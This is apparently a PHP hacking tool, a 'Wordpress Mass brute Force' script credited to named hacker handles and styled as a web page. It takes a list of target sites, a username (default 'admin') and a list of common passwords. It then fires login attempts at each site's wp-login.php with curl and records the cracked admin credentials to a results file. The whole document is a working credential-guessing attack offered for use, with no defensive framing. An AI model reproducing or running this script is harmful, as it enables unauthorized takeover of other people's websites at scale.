WPBF

1. <?
2. # Wordpress Mass brute Force Priv8 ^_*
3. # Coded by Lagrip-dz
4. # Devloped by Th3 K!LL3r Dz
5. # Style Leacked By Th3 K!LL3r Dz
6. # copyright to sec4ever.com
7. # special Greet'z to : n4ssim , Damane2011
8. # Greet'z to : all sec4ver members
9. echo '<html>
10. <head>
11. <link href="http://dz48-coders.org/indexi/pic/favicon.ico" type="image/x-icon" rel="shortcut icon" />
12. <meta name="author" content="Th3 K!LL3r Dz" />
13. <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
14. <meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
15. <title># Wordpress Mass brute Force #</title>
16. <style type=\'text/css\'>
17. input[type=submit], input[type=button], input[type=reset]{
18. text-align:center;
19. background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
20. border:1px solid #4D4D4D;
21. color:#FFFFFF;
22. border-top-color:#565656;
23. padding:4px 6px;
24. margin:4px 5px;
25. height:16px;
26. -moz-box-shadow:0 0 1px black;
27. -webkit-box-shadow:0 0 1px black;
28. box-shadow:0 0 1px black;
29. text-shadow:0 1px black;
30. -moz-border-radius:4px;
31. -webkit-border-radius:4px;
32. -khtml-border-radius:4px;
33. border-radius:4px;
34. height:23px;
35. }
36.  
37.  
38. input[type=text], input[type=password]{
39. background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
40. border:1px solid #4D4D4D;
41. color:#CCCCCC;
42. border-top-color:#565656;
43. -moz-box-shadow:0 0 1px black;
44. -webkit-box-shadow:0 0 1px black;
45. box-shadow:0 0 1px black;
46. -moz-border-radius:4px;
47. -webkit-border-radius:4px;
48. -khtml-border-radius:4px;
49. border-radius:4px;
50. height:18px;
51. margin-left: 5px;
52. }
53. input , textarea , button , body , caption , table ,area , option {
54. outline:none;
55. transition: all 0.20s ease-in-out;
56. -webkit-transition: all 0.25s ease-in-out;
57. -moz-transition: all 0.25s ease-in-out;
58. border-radius:3px;
59. -webkit-border-radius:3px;
60. -moz-border-radius:3px;
61. //border:1px solid rgba(0,0,0, 0.2);
62. /* font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
63. }
64. input , textarea {
65. background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
66. }
67.  
68. input , textarea {
69. outline:none;
70. transition: all 0.20s ease-in-out;
71. -webkit-transition: all 0.25s ease-in-out;
72. -moz-transition: all 0.25s ease-in-out;
73. border-radius:3px;
74. -webkit-border-radius:3px;
75. -moz-border-radius:3px;
76. border:1px solid rgba(0,0,0, 0.2);
77. }
78. input:focus, textarea:focus {
79. outline: 0;
80. border-color: rgba(82, 168, 236, 0.8);
81. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
82. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
83. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
84.  
85.  
86. background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
87. overflow: auto;
88.  
89. }
90. .x1 {}
91. .x2 {font-size:13px;
92. background-color:green;
93. color:black;}
94. hr {color:white;}
95. a {color:black;}
96. #x5 {
97. font-family:tahoma;}
98. .d1 {color :#C17E0B;
99. font-family:tahoma;
100. font-size:13px;
101. font-weight:bold;}
102. #d4 {color:#C17E0B;
103. font-family:tahoma;
104. font-weight:bold;}
105. </style>
106. </head>
107. </br></br>
108. <center><b><font > Wordpress Mass brute Force </font></b><br /><br /><br />
109. <form method="post" action="" enctype="multipart/form-data">
110. <table width="50%" border="0">
111. <tr><td><p ><font class="d1">User :</font>
112. <input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
113. </td></tr>
114. <tr><td><font class="d1">Sites list :</font>
115. </td><td><font class="d1" >Pass list :</font></td></tr>
116. <tr><td>
117. <textarea name="sites" cols="40" rows="13" ></textarea>
118. </td><td>
119. <textarea name="w0rds" cols="20" rows="13" >
120. admin
121. 123456
122. password
123. 102030
124. 123123
125. 12345
126. 123456789
127. pass
128. test
129. admin123
130. demo
131. </textarea>
132. </td></tr><tr><td>
133. <font >
134. <input type="submit" name="x" value="start" id="d4">
135. </font></td></tr></table>
136. </form></center>';
137. @set_time_limit(0);
138.  
139.  
140. if($_POST['x']){
141.  
142. echo "<hr>";
143.  
144. $sites = explode("\n",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz !
145. $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz !
146.  
147. $Attack = new Wordpress_brute_Force(); // Active Class
148.  
149.  
150. foreach($w0rds as $pwd){
151.  
152. foreach($sites as $site){
153.  
154.  
155. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
156. flush();flush();
157.  
158. }
159.  
160. }
161.  
162. }
163.  
164.  
165. # Class & Function'z
166.  
167. function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
168.  
169. class Wordpress_brute_Force{
170.  
171. public function check_it($site,$user,$pass){ // print result
172.  
173. if(eregi('profile.php',$this->post($site,$user,$pass))){
174. echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/wp-admin/'>$site/wp-admin/</a></b></span><BR>";
175. $f = fopen("Wp-Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/wp-admin/\n"); fclose($f);
176. flush();
177. }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
178.  
179. }
180.  
181. public function post($site,$user,$pass){ // Post -> user & pass
182. $login =$site.'/wp-login.php';
183. $to = $site.'/wp-admin';
184. $token = $this->extract_token($site);
185. $log = array ('Log In','دخول');
186. $data = array ('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>$log,'redirect_to'=>$to,'testcookie'=>1);
187.  
188. $curl=curl_init();
189.  
190. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
191. curl_setopt($curl,CURLOPT_URL,$login);
192. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
193. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
194. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
195. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
196. curl_setopt($curl,CURLOPT_POST,1);
197. curl_setopt($curl,CURLOPT_POSTFIELDS,$data);
198. curl_setopt($curl,CURLOPT_TIMEOUT,20);
199.  
200. $exec=curl_exec($curl);
201. curl_close($curl);
202. return $exec;
203.  
204. }
205.  
206. public function extract_token($site){ // get token from source for -> function post
207.  
208. $source = $this->get_source($site);
209.  
210. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
211.  
212. return $token[1][0];
213.  
214. }
215.  
216. public function get_source($site){ // get source for -> function extract_token
217.  
218. $curl=curl_init();
219. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
220. curl_setopt($curl,CURLOPT_URL,$login);
221. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
222. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
223. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
224. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
225. curl_setopt($curl,CURLOPT_TIMEOUT,20);
226.  
227. $exec=curl_exec($curl);
228. curl_close($curl);
229. return $exec;
230.  
231. }
232.  
233. }
234. ?>